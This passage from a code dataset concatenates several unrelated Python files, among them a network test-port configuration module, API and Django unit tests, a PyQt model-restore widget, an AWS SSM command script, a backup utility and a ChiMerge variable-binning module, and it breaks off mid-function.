auto_negotiate = \"True\"\n proposed_import = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"speed\": Vport._SPEED_MAP[layer1.speed],\n \"{0}\".format(auto_field_name): False\n if auto_negotiate is None\n else auto_negotiate,\n \"enableRsFec\": False if rs_fec is None else rs_fec,\n \"linkTraining\": False if link_training is None else link_training,\n \"speedAuto\": advertise,\n }\n proposed_import[\"media\"] = layer1.get(\"media\", with_default=True)\n self._add_l1config_import(vport, proposed_import, imports)\n\n def _get_speed(self, vport, layer1):\n if vport[\"type\"] == \"ethernetvm\":\n return Vport._VM_SPEED_MAP[layer1.speed]\n else:\n return Vport._SPEED_MAP[layer1.speed]\n\n def _reset_auto_negotiation(self, vport, layer1, imports):\n if (\n layer1.speed.endswith(\"_mbps\") is False\n and layer1.speed != \"speed_1_gbps\"\n ):\n imports.append(\n {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"enableAutoNegotiation\": layer1.get(\n \"auto_negotiate\", with_default=True\n ),\n }\n )\n\n def _set_fcoe(self, vport, layer1, imports):\n flow_control = layer1.get(\"flow_control\")\n if flow_control is None:\n return\n directed_address = flow_control.get(\n \"directed_address\", with_default=True\n )\n directed_address = \"\".join(directed_address.split(\":\"))\n l1_xpath = \"%s/l1Config/%s\" % (\n vport[\"xpath\"],\n vport[\"type\"].replace(\"Fcoe\", \"\"),\n )\n imports.append(\n {\"xpath\": l1_xpath, \"flowControlDirectedAddress\": directed_address}\n )\n xpath = \"%s/l1Config/%s/fcoe\" % (\n vport[\"xpath\"],\n vport[\"type\"].replace(\"Fcoe\", \"\"),\n )\n fcoe = {\n \"xpath\": xpath,\n \"flowControlType\": Vport._FLOW_CONTROL_MAP[flow_control.choice],\n }\n if flow_control.choice == \"ieee_802_1qbb\":\n pfc = flow_control.get(\"ieee_802_1qbb\", with_default=True)\n pfc_delay = pfc.get(\"pfc_delay\", with_default=True)\n fcoe[\"enablePFCPauseDelay\"] = False if pfc_delay == 0 else True\n fcoe[\"pfcPauseDelay\"] = pfc_delay\n fcoe[\"pfcPriorityGroups\"] = [\n -1 if pfc.pfc_class_0 is None else pfc.pfc_class_0,\n -1 if pfc.pfc_class_1 is None else pfc.pfc_class_1,\n -1 if pfc.pfc_class_2 is None else pfc.pfc_class_2,\n -1 if 
pfc.pfc_class_3 is None else pfc.pfc_class_3,\n -1 if pfc.pfc_class_4 is None else pfc.pfc_class_4,\n -1 if pfc.pfc_class_5 is None else pfc.pfc_class_5,\n -1 if pfc.pfc_class_6 is None else pfc.pfc_class_6,\n -1 if pfc.pfc_class_7 is None else pfc.pfc_class_7,\n ]\n fcoe[\"priorityGroupSize\"] = \"priorityGroupSize-8\"\n fcoe[\"supportDataCenterMode\"] = True\n imports.append(fcoe)\n\n def _clear_ownership(self, locations):\n try:\n force_ownership = (\n self._api.snappi_config.options.port_options.location_preemption\n )\n except Exception:\n force_ownership = False\n self.logger.debug(\"location_preemption is %s\" % force_ownership)\n if force_ownership is True:\n self.logger.debug(\"We are clearing ownership\")\n available_hardware_hrefs = {}\n location_hrefs = {}\n for location in locations:\n if \";\" in location:\n clp = location.split(\";\")\n chassis = (\n self._api._ixnetwork.AvailableHardware.Chassis.find(\n Hostname=clp[0]\n )\n )\n if len(chassis) > 0:\n available_hardware_hrefs[\n location\n ] = \"%s/card/%s/port/%s\" % (\n chassis.href,\n abs(int(clp[1])),\n abs(int(clp[2])),\n )\n elif \"/\" in location:\n appliance = location.split(\"/\")[0]\n locations = self._api._ixnetwork.Locations\n locations.find(Hostname=appliance)\n if len(locations) == 0:\n locations.add(Hostname=appliance)\n ports = locations.Ports.find(Location=\"^%s$\" % location)\n if len(ports) > 0:\n location_hrefs[location] = ports.href\n self._api.clear_ownership(available_hardware_hrefs, location_hrefs)\n\n def _set_result_value(\n self, row, column_name, column_value, column_type=str\n ):\n if (\n len(self._column_names) > 0\n and column_name not in self._column_names\n ):\n return\n try:\n row[column_name] = column_type(column_value)\n except Exception:\n if column_type.__name__ in [\"float\", \"int\"]:\n row[column_name] = 0\n else:\n row[column_name] = column_value\n\n def results(self, request):\n \"\"\"Return port results\"\"\"\n\n self._column_names = request.get(\"column_names\")\n if self._column_names is None:\n self._column_names = []\n elif not isinstance(self._column_names, list):\n msg = \"Invalid format of column_names passed {},\\\n expected list\".format(\n self._column_names\n )\n raise Exception(msg)\n\n port_names = request.get(\"port_names\")\n if port_names is None or len(port_names) == 0:\n port_names = [port.name for port in self._api._config.ports]\n elif not isinstance(port_names, list):\n msg = \"Invalid format of port_names passed {},\\\n expected list\".format(\n port_names\n )\n raise Exception(msg)\n\n self.logger.debug(\"Extracting %s stats for these ports %s\" % (\n self._column_names, port_names\n ))\n port_filter = {\"property\": \"name\", \"regex\": \".*\"}\n port_filter[\"regex\"] = \"^(%s)$\" % \"|\".join(\n self._api.special_char(port_names)\n )\n\n port_rows = dict()\n vports = self._api.select_vports(port_name_filters=[port_filter])\n for vport in vports.values():\n port_row = dict()\n self._set_result_value(port_row, \"name\", vport.get(\"name\"))\n location = vport.get(\"location\")\n if (\n vport.get(\"connectionState\").startswith(\"connectedLink\")\n is True\n ):\n location += \";connected\"\n elif len(location) > 0:\n location += \";\" + vport.get(\"connectionState\")\n else:\n location = vport.get(\"connectionState\")\n self._set_result_value(port_row, \"location\", location)\n self._set_result_value(\n port_row,\n \"link\",\n \"up\"\n if vport[\"connectionState\"] == \"connectedLinkUp\"\n else \"down\",\n )\n self._set_result_value(port_row, \"capture\", 
\"stopped\")\n # init all columns with corresponding zero-values so that\n # the underlying dictionary contains all requested columns\n # in an event of unwanted exceptions\n for ext_name, _, typ in self._RESULT_COLUMNS:\n self._set_result_value(port_row, ext_name, 0, typ)\n\n port_rows[vport[\"name\"]] = port_row\n\n try:\n table = self._api.assistant.StatViewAssistant(\"Port Statistics\")\n except Exception:\n self._api.warning(\"Could not retrive the port statistics viewer\")\n return list(port_rows.values())\n\n self.logger.debug(\"These are port results:\")\n for row in table.Rows:\n vport_name = row[\"Port Name\"]\n if vport_name is None:\n raise Exception(\"Could not retrive 'Port Name' from stats\")\n port_row = port_rows.get(vport_name)\n self.logger.debug(str(port_row))\n if port_row is None:\n continue\n for ext_name, int_name, typ in self._RESULT_COLUMNS:\n try:\n row_val = row[int_name]\n self._set_result_value(port_row, ext_name, row_val, typ)\n except Exception:\n # TODO print a warning maybe ?\n pass\n return list(port_rows.values())\n","sub_path":"snappi_ixnetwork/vport.py","file_name":"vport.py","file_ext":"py","file_size_in_byte":32346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"317539783","text":"import unittest\nimport sys\n\nfrom os import path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom src.resources.users import UsersIdsCars\n\npath = \"/api/v1/users/\"\n\nclass TestCase(unittest.TestCase):\n\n def test_get_action(self):\n service = UsersIdsCars()\n expected = \"GET request on \" + path + \"1/cars\"\n assert service.get(1) == expected\n\n def test_post_action(self):\n service = UsersIdsCars()\n expected = \"POST request on \" + path + \"1/cars\"\n assert service.post(1) == expected\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_users_ids_cars.py","file_name":"test_users_ids_cars.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"449658201","text":"from PyQt5 import QtWidgets\nimport pickle\n\nfrom point_spectra_gui.ui.RestoreRegressionModel import Ui_loadData\nfrom point_spectra_gui.util.Modules import Modules\n\n\nclass RestoreRegressionModel(Ui_loadData, Modules):\n \"\"\"\n Restores a previously pickled Regression Model into the UI.\n The data needs to be a .pickle file in order for this widget to work\n \"\"\"\n\n def setupUi(self, Form):\n super().setupUi(Form)\n Modules.setupUi(self, Form)\n\n def get_widget(self):\n return self.groupBox\n\n def connectWidgets(self):\n self.newFilePushButton.clicked.connect(lambda: self.getDataButton_clicked(self.fileNameLineEdit))\n\n def getDataButton_clicked(self, lineEdit):\n starting_path = self.outpath + \"/saved_models\"\n\n filename, _filter = QtWidgets.QFileDialog.getOpenFileName(None, \"Select Regression Model File\", starting_path, \"(*.pickle)\")\n lineEdit.setText(filename)\n if lineEdit.text() == \"\":\n lineEdit.setText(\"*.pickle\")\n\n def run(self, filename = None, keyname = None):\n if filename == None:\n filename = self.fileNameLineEdit.text()\n print('Loading Regression Model From: ' + str(filename))\n\n pickle_file = open(filename, \"rb\")\n\n regression_model = pickle.load(pickle_file)\n restored_modelkey = regression_model.modelkey\n\n pickle_file.close()\n\n self.models[restored_modelkey] = regression_model\n self.modelkeys.append(restored_modelkey)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n\n Form = QtWidgets.QWidget()\n ui = RestoreRegressionModel()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n","sub_path":"point_spectra_gui/core/RestoreRegressionModel.py","file_name":"RestoreRegressionModel.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435219162","text":"#!/usr/bin/env python\nimport boto3\nimport time\nimport sys\nfrom logging import getLogger, StreamHandler, DEBUG, Formatter\nfrom datetime import datetime\n\nargs = sys.argv\ncommand = \"cat /etc/hosts\"\ninstance_id = args[1]\nssm = boto3.client('ssm')\n\n##Command投入\n\nr = ssm.send_command(\n InstanceIds = [instance_id],\n DocumentName = \"AWS-RunShellScript\",\n Parameters = {\n \"commands\": [\n command\n ] \n }\n )\ncommand_id = r['Command']['CommandId']\n\n## 処理終了待ち\ntime.sleep(5)\n\nres = ssm.list_command_invocations(\n CommandId = command_id,\n Details = True\n )\ninvocations = res['CommandInvocations']\nstatus = invocations[0]['Status']\n\nif status == \"Failed\":\n print(\"Command実行エラー\")\n\n## 結果格納\n\naccount = invocations[0]['CommandPlugins'][0]['Output']\nprint(account)","sub_path":"src/aws_run_command.py","file_name":"aws_run_command.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"238364470","text":"import Connections\nfrom Quick_Python import run_query\n\n\ndef info_skills():\n query = \"select Name from Info_Skills Where Job = 'True' ORDER BY Name\"\n cursor = run_query(query)\n rows = cursor.fetchall()\n skills = []\n for row in rows:\n skills.append(row.Name)\n return skills\n\n\ndef info_classes():\n query = \"select Class from Info_Classes ORDER BY Class \"\n cursor = run_query(query)\n rows = cursor.fetchall()\n classes = []\n for row in rows:\n classes.append(row.Class)\n return classes\n","sub_path":"cogs/Utility_Menu/SQL_Lookup.py","file_name":"SQL_Lookup.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196829915","text":"#-------------------------------------------------------------------------------\n# Name: pybak.py\n# Purpose: Create a backup of files contained in one or more directories.\n#\n# Author: Jeremy Morris\n#\n# Created: 14/03/2015\n# Copyright: (c) Jeremy 2015\n# License: MIT\n#-------------------------------------------------------------------------------\n\nimport datetime\nimport os\nimport shutil\nimport errno\nimport yaml\n\ndef parse_config():\n #This path will need to be edited depening on how you run this script.\n with open('config\\data.yaml') as f:\n return yaml.load(f)\n \ndef get_backup_directory(target_dir, name):\n date = datetime.datetime.now().strftime('%Y-%m-%d_%H%M')\n return target_dir.format(name, date)\n\ndef copy_files_to(task): #EDIT this to include ignore_patterns.\n try:\n shutil.copytree(task['source'], task['target'])\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(task['source'], task['target'])\n else:\n print('Directory not copied. Error: %s' % e)\n\ndef perform_backup(task):\n task['target'] = get_backup_directory(task['base_backup_dir'], task['name'])\n copy_files_to(task)\n\ndef job_runner(task):\n current_job = {'base_backup_dir' : task['base_backup_dir']}\n for job in task['jobs']:\n current_job['name'] = job[0]\n current_job['source'] = job[1]\n perform_backup(current_job)\n\ndef main():\n job_runner(parse_config())\n \n\nif __name__ == '__main__':\n main()","sub_path":"pybak/pybak.py","file_name":"pybak.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"228380306","text":"from django.core import mail\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom data.factories import CanteenFactory\n\n\nclass TestCanteenContact(APITestCase):\n @override_settings(DEFAULT_FROM_EMAIL=\"contact@example.com\")\n def test_contact_canteen(self):\n \"\"\"\n An email should be sent to the managing team when the contact endpoint is called\n \"\"\"\n canteen = CanteenFactory.create()\n payload = {\n \"canteenId\": canteen.id,\n \"from\": \"test@example.com\",\n \"name\": \"Camille Dupont\",\n \"message\": \"Test message \",\n }\n response = self.client.post(reverse(\"contact_canteen\"), payload)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(mail.outbox), 1)\n email = mail.outbox[0]\n # sent to all managers and our team\n self.assertEqual(len(email.to), canteen.managers.all().count() + 1)\n self.assertEqual(email.from_email, \"contact@example.com\")\n self.assertIn(\"Camille Dupont\", email.body)\n self.assertIn(\"Test message \", email.body)\n self.assertIn(\"contact@example.com\", email.body)\n self.assertEqual(len(email.reply_to), 1)\n self.assertEqual(email.reply_to[0], \"test@example.com\")\n\n @override_settings(DEFAULT_FROM_EMAIL=\"contact@example.com\")\n def test_anonymous_contact(self):\n \"\"\"\n If a name isn't given, gracefully handle email text\n \"\"\"\n canteen = CanteenFactory.create()\n payload = {\n \"canteenId\": canteen.id,\n \"from\": \"test@example.com\",\n \"name\": \"\",\n \"message\": \"Test\",\n }\n self.client.post(reverse(\"contact_canteen\"), payload)\n\n self.assertIn(\"Une personne\", mail.outbox[0].body)\n","sub_path":"api/tests/test_contact_canteen.py","file_name":"test_contact_canteen.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"190621502","text":"import os\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom wand.image import Image\n\nfrom openpyxl import Workbook\n\nclass Command(BaseCommand):\n # args = ''\n help = 'Converts data to spreadsheet'\n\n def handle(self, filename, *args, **options):\n try:\n data = [['one', 'two', 'three', 'four'], [1, 2, 3, 4]]\n wb = Workbook()\n ws = wb.active\n for row in data:\n ws.append(row)\n wb.save('example.xlsx')\n except Exception as e:\n raise CommandError(e.message)\n","sub_path":"src/components/convert_to_spreadsheet.py","file_name":"convert_to_spreadsheet.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"443328684","text":"# coding=utf-8\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport math\r\nfrom sklearn.utils.multiclass import type_of_target\r\nimport varclus_analysis\r\nimport csv\r\nimport decision_tree_binning as dt\r\n#import model_helper\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tqdm import tqdm\r\nimport matplotlib.pyplot as plt\r\nfrom functools import partial\r\nimport statsmodels.api as sm\r\nimport model_helper_y as helper\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom multiprocessing import Process,Pool,Queue\r\nimport multiprocessing\r\n\r\ndef variableFilter(inputData,unique_threshold=100):\r\n nominal_vars = getNominalVars(inputData)\r\n cols2drop = []\r\n for col in nominal_vars:\r\n counts = len(inputData[col].unique())\r\n if counts > unique_threshold or counts == 1:\r\n cols2drop.append(col)\r\n \r\n numerical_vars = [col for col in inputData.columns if col not in nominal_vars]\r\n for col in numerical_vars:\r\n counts = len(inputData[col].unique())\r\n if counts == 1:\r\n cols2drop.append(col)\r\n \r\n return cols2drop\r\n\r\ndef getNominalVars(inputData):\r\n nominal_flag = inputData.dtypes == 'object'\r\n nominal_vars = inputData.columns[nominal_flag].values.tolist()\r\n \r\n return nominal_vars\r\n\r\ndef readFile(path):\r\n '''\r\n Read raw data from an user defined file\r\n @Params: String \r\n @Return: Pandas DataFrame\r\n '''\r\n dataset = None\r\n if type(path) == str and 'csv' in path:\r\n dataset = pd.read_csv(path)\r\n elif type(path) == str and 'pkl' in path:\r\n dataset = pd.read_pickle(path)\r\n elif type(path) == str and 'xlsx' in path:\r\n dataset = pd.read_excel(path)\r\n else:\r\n raise TypeError(\"Input data should be in following types: csv,pkl,xlsx.\")\r\n \r\n return dataset\r\n\r\ndef split(content,i):\r\n '''\r\n Split the attributes, collect the data of the ith attribute, i = 0,1,2,3...\r\n Return a dataframe with selected attribute and the target\r\n \r\n notes: the target variable should be the last column\r\n @Params: Pandas DataFrame \r\n @Return: Pandas DataFrame \r\n '''\r\n content = content.iloc[:,[i,-1]]\r\n \r\n return content\r\n\r\ndef count(data_set):\r\n '''\r\n Count the number of exactly same records\r\n \r\n @Params: Pandas DataFrame\r\n @Return: Pandas DataFrame\r\n '''\r\n columns = data_set.columns.values.tolist()\r\n data_set['count'] = 1\r\n counted_data = data_set.groupby(columns,as_index=False)['count'].sum()\r\n \r\n return counted_data\r\n\r\ndef build(counted_data):\r\n '''\r\n Build a structure that ChiMerge algorithm works properly on it \r\n Return a dictionary\r\n @Params: tuple\r\n @Return: list of tuples like [(Bug,[69,0]),(Dragon,[20,12])]\r\n '''\r\n target_values = counted_data.iloc[:,-2].value_counts().index.tolist()\r\n n = len(target_values)\r\n length_dic = {}\r\n for record in counted_data.values.tolist():\r\n flag = 0\r\n if record[0] not in length_dic.keys():\r\n length_dic[record[0]] = [0] * n\r\n for i in range(n):\r\n if record[1] == target_values[i]:\r\n length_dic[record[0]][i] = record[2]\r\n flag += 1\r\n if flag == 0:\r\n raise TypeError(\"Data Exception\")\r\n length_dic = sorted(length_dic.items())\r\n \r\n return length_dic\r\n\r\ndef Initialize(content,i):\r\n dataset = split(content,i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n return length_dic\r\n\r\ndef chi2(intervals):\r\n '''\r\n Compute the Chi-Square value\r\n @Params: List\r\n Numerical intervals and 
corresponding Y targets \r\n in a form like [[2,15],\r\n [11,0]]\r\n @Return: Integer \r\n chi2 statistic-test result\r\n '''\r\n m=len(intervals) \r\n num_class=len(intervals[0]) \r\n #sum of each row\r\n Rows=[] \r\n for i in range(m): \r\n sum=0 \r\n for j in range(num_class): \r\n sum+=intervals[i][j] \r\n Rows.append(sum) \r\n #sum of each column\r\n Cols=[] \r\n for j in range(num_class): \r\n sum=0 \r\n for i in range(m): \r\n sum+=intervals[i][j] \r\n Cols.append(sum) \r\n #total number in the intervals\r\n N=0 \r\n for i in Cols: \r\n N += i \r\n \r\n chi_value=0 \r\n for i in range(m): \r\n for j in range(num_class): \r\n Estimate=Rows[i]*Cols[j]/N \r\n if Estimate!=0: \r\n chi_value=chi_value+(intervals[i][j]-Estimate)**2/Estimate \r\n return chi_value \r\n\r\ndef ChiMerge(length_dic,max_interval,df = 1): \r\n ''' ChiMerge algorithm \r\n Return split points for Numerical attributes\r\n @Params: List of tuples stand for each unique interval and its Y result\r\n Integer\r\n Integer\r\n @Return: List\r\n '''\r\n num_interval=len(length_dic)\r\n ceil = max(record[0] for record in length_dic) \r\n print(ceil) \r\n if max_interval is not None:\r\n while(num_interval>max_interval): \r\n num_pair=num_interval-1 \r\n chi_values=[]\r\n #calculate the chi value of each neighbor interval \r\n for i in range(num_pair): \r\n intervals=[length_dic[i][1],length_dic[i+1][1]] \r\n chi_values.append(chi2(intervals)) \r\n # get the minimum chi value \r\n min_chi=min(chi_values)\r\n for i in range(num_pair-1,-1,-1): # treat from the last one, because I change the bigger interval as 'Merged' \r\n if chi_values[i]==min_chi:\r\n # combine the two adjacent intervals\r\n temp = length_dic[i][:]\r\n for j in range(len(length_dic[i+1])):\r\n temp[1][j] += length_dic[i+1][1][j]\r\n \r\n length_dic[i]=temp \r\n length_dic[i+1]='Merged'\r\n while('Merged' in length_dic): # remove the merged record \r\n length_dic.remove('Merged') \r\n num_interval=len(length_dic)\r\n \r\n split_points = []\r\n for record in length_dic:\r\n split_points.append(record[0])\r\n \r\n print('split_point = {lst} \\nfinal intervals'.format(lst = split_points))\r\n split_points.append(ceil)\r\n \r\n for i in range(len(split_points)-1):\r\n print(str(split_points[i]) + '~' + str(split_points[i+1]))\r\n\r\n return(split_points) \r\n\r\ndef ChiMerge_cfl(length_dic,confidence_level,df = 1): \r\n ''' ChiMerge algorithm \r\n Return split points for Numerical attributes applying confidence level standard\r\n instead of assigning max intervals\r\n @Params: List of tuples stand for each unique interval and its Y result\r\n Float\r\n Integer\r\n @Return: List '''\r\n chi_threshold = {0.9:2.7,\r\n 0.95:3.84,\r\n 0.99:6.635}\r\n num_interval=len(length_dic)\r\n #print(length_dic)\r\n ceil = max(record[0] for record in length_dic) \r\n print(ceil) \r\n #TODO\r\n if confidence_level is not None:\r\n threshold = chi_threshold.get(confidence_level)\r\n while(True):\r\n num_pair=num_interval-1 \r\n chi_values=[]\r\n #calculate the chi value of each neighbor interval \r\n for i in range(num_pair): \r\n intervals=[length_dic[i][1],length_dic[i+1][1]]\r\n chi_values.append(chi2(intervals)) \r\n # get the minimum chi value \r\n #TODO BUG\r\n #print(chi_values)\r\n min_chi=min(chi_values)\r\n # if the minimum chi value is bigger than threshold then stop\r\n if min_chi > threshold or len(chi_values) == 1:\r\n break\r\n for i in range(num_pair-1,-1,-1): # treat from the last one, because I change the bigger interval as 'Merged' \r\n if 
chi_values[i]==min_chi:\r\n # combine the two adjacent intervals\r\n temp = length_dic[i][:]\r\n for j in range(len(length_dic[i+1])):\r\n temp[1][j] += length_dic[i+1][1][j]\r\n \r\n length_dic[i]=temp \r\n length_dic[i+1]='Merged'\r\n while('Merged' in length_dic): # remove the merged record \r\n length_dic.remove('Merged') \r\n num_interval=len(length_dic)\r\n \r\n split_points = []\r\n for record in length_dic:\r\n split_points.append(record[0])\r\n \r\n print('split_point = {lst} \\nfinal intervals'.format(lst = split_points))\r\n split_points.append(ceil)\r\n \r\n for i in range(len(split_points)-1):\r\n print(str(split_points[i]) + '~' + str(split_points[i+1]))\r\n\r\n return(split_points) \r\n\r\n'''\r\n@deprecated\r\ndef detectNaN(length_dic):\r\n \r\n length_dic_bf = len(length_dic)\r\n nan_flag = False\r\n length_dic = [record for record in length_dic if record[0] != 'NaN']\r\n length_dic_af = len(length_dic)\r\n if length_dic_bf != length_dic_af:\r\n nan_flag = True\r\n \r\n return length_dic,nan_flag\r\n'''\r\n\r\ndef cal_nominal_intervals(col,inputData,target):\r\n #lock.acquire()\r\n nominal_intervals = {}\r\n print('\\n'+col)\r\n dataset = inputData.loc[:,[col,target]].values.tolist()\r\n nominal_split = dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[col] = nominal_split\r\n #lock.release()\r\n\r\n return nominal_intervals\r\n\r\ndef cal_intervals(index,inputData,target,other_var_lst,max_interval):\r\n #lock.acquire()\r\n intervals = {}\r\n print('\\n'+other_var_lst[index]) \r\n dataset = split(inputData[other_var_lst+[target]],index)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n split_points = ChiMerge(length_dic,max_interval)\r\n intervals[other_var_lst[index]] = split_points\r\n #lock.release()\r\n\r\n return intervals\r\n\r\ndef discrete(inputData,nominal_var_lst,max_interval=6,multiprocess = False): \r\n '''Discrete the given dataset\r\n @Params: DataFrameList includes variable names for nominal columns\r\n Integer\r\n @Return: \r\n Dictionary numerical intervals\r\n Dictionary nominal intervals\r\n lock.release()'''\r\n #m = multiprocessing.Manager()\r\n #lock = m.Lock()\r\n if multiprocess != False:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n target = inputData.columns.values[-1]\r\n cpu_cnts = multiprocessing.cpu_count()\r\n pool = multiprocessing.Pool(cpu_cnts)\r\n multiple_results1 = [pool.apply_async(cal_nominal_intervals,(col,inputData,target)) for col in nominal_var_lst]\r\n multiple_results2 = [pool.apply_async(cal_intervals,(index,inputData,target,other_var_lst,max_interval)) for index in range(len(other_var_lst))]\r\n pool.close()\r\n pool.join()\r\n\r\n nominal_intervals = {}\r\n for res in multiple_results1:\r\n nominal_intervals.update(res.get())\r\n\r\n intervals = {}\r\n for res in multiple_results2:\r\n intervals.update(res.get())\r\n\r\n return intervals,nominal_intervals,inputData\r\n \r\n else:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n #print(attribute_list)\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n #print(other_var_lst)\r\n target = inputData.columns.values[-1]\r\n \r\n #iterate nominal variables\r\n nominal_intervals = {}\r\n for i in range(len(nominal_var_lst)):\r\n print('\\n'+nominal_var_lst[i])\r\n dataset = inputData.loc[:,[nominal_var_lst[i],target]].values.tolist()\r\n #print(dataset)\r\n nominal_split = 
dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[nominal_var_lst[i]] = nominal_split \r\n\r\n #iterate ordinal and numerical variables\r\n intervals = {}\r\n for i in range(len(other_var_lst)):\r\n print('\\n'+other_var_lst[i])\r\n #length_dic,pokemon = Initialize(pokemon,i)\r\n \r\n dataset = split(inputData[other_var_lst+[target]],i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n split_points = ChiMerge(length_dic,max_interval)\r\n intervals[other_var_lst[i]] = split_points\r\n\r\n return intervals,nominal_intervals,inputData\r\n\r\ndef cal_intervals_cfl(index,inputData,target,other_var_lst,confidence_level):\r\n #lock.acquire()\r\n intervals = {}\r\n print('\\n'+other_var_lst[index]) \r\n dataset = split(inputData[other_var_lst+[target]],index)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n split_points = ChiMerge_cfl(length_dic,confidence_level)\r\n intervals[other_var_lst[index]] = split_points\r\n #lock.release()\r\n\r\n return intervals\r\n\r\ndef discrete_cfl(inputData,nominal_var_lst,confidence_level=0.95,EPS=1e-7,multiprocess = False): \r\n '''Discrete the given dataset by applying confidence level\r\n @Params: DataFrame\r\n List includes variable names for nominal columns\r\n Integer\r\n @Return: \r\n Dictionary numerical intervals\r\n Dictionary nominal intervals\r\n ''' \r\n if multiprocess != False:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n target = inputData.columns.values[-1]\r\n cpu_cnts = multiprocessing.cpu_count()\r\n pool = multiprocessing.Pool(cpu_cnts)\r\n multiple_results1 = [pool.apply_async(cal_nominal_intervals,(col,inputData,target)) for col in nominal_var_lst]\r\n multiple_results2 = [pool.apply_async(cal_intervals_cfl\r\n ,(index,inputData,target,other_var_lst,confidence_level)) for index in range(len(other_var_lst))]\r\n pool.close()\r\n pool.join()\r\n\r\n nominal_intervals = {}\r\n for res in multiple_results1:\r\n nominal_intervals.update(res.get())\r\n\r\n intervals = {}\r\n for res in multiple_results2:\r\n intervals.update(res.get())\r\n\r\n return intervals,nominal_intervals,inputData\r\n \r\n else:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n #print(attribute_list)\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n #print(other_var_lst)\r\n target = inputData.columns.values[-1]\r\n \r\n #iterate nominal variables\r\n nominal_intervals = {}\r\n for i in range(len(nominal_var_lst)):\r\n print('\\n'+nominal_var_lst[i])\r\n dataset = inputData.loc[:,[nominal_var_lst[i],target]].values.tolist()\r\n #print(dataset)\r\n nominal_split = dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[nominal_var_lst[i]] = nominal_split \r\n\r\n #iterate ordinal and numerical variables\r\n intervals = {}\r\n for i in range(len(other_var_lst)):\r\n print('\\n'+other_var_lst[i])\r\n #length_dic,pokemon = Initialize(pokemon,i)\r\n \r\n dataset = split(inputData[other_var_lst+[target]],i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n split_points = ChiMerge_cfl(length_dic,confidence_level)\r\n intervals[other_var_lst[i]] = split_points\r\n\r\n return intervals,nominal_intervals,inputData\r\n\r\ndef nominal_trans(col,inputData,nominal_intervals):\r\n #rst_s = pd.Series()\r\n if col.strip() != \"\":\r\n rst_s = 
pd.Series(inputData[col].apply(nominal_bin_convar,values=nominal_intervals[col]).values.tolist())\r\n #rst_s = rst_s.reset_index(drop=True)\r\n rst_s.name = col + '_bin'\r\n #print('---------nominal')\r\n #print(len(rst_s))\r\n return rst_s\r\n else:\r\n pass \r\n\r\ndef interval_trans(col,inputData,intervals):\r\n #rst_s = pd.Series()\r\n if col.strip() != \"\":\r\n rst_s = pd.Series(inputData[col].apply(bin_convar,values=intervals[col]).values.tolist())\r\n #rst_s = rst_s.reset_index(drop=True)\r\n rst_s.name = col + '_bin' \r\n #print('---------interval')\r\n #print(len(rst_s))\r\n return rst_s\r\n else:\r\n pass\r\n\r\ndef dataTransfer(inputData,intervals,nominal_intervals,multiprocess = False):\r\n '''\r\n Project the binning points back to corresponding variables \r\n and update the original dataset\r\n @Params: DataFrame,Dictionary,Dictionary\r\n '''\r\n if multiprocess != False:\r\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\r\n # deal with categorical variables\r\n multiple_results1 = [pool.apply_async(nominal_trans,(col,inputData,nominal_intervals)) for col in nominal_intervals.keys()]\r\n multiple_results2 = [pool.apply_async(interval_trans,(col,inputData,intervals)) for col in intervals.keys()]\r\n pool.close()\r\n pool.join()\r\n \r\n part1_df = pd.concat([s.get() for s in multiple_results1],axis=1)\r\n part2_df = 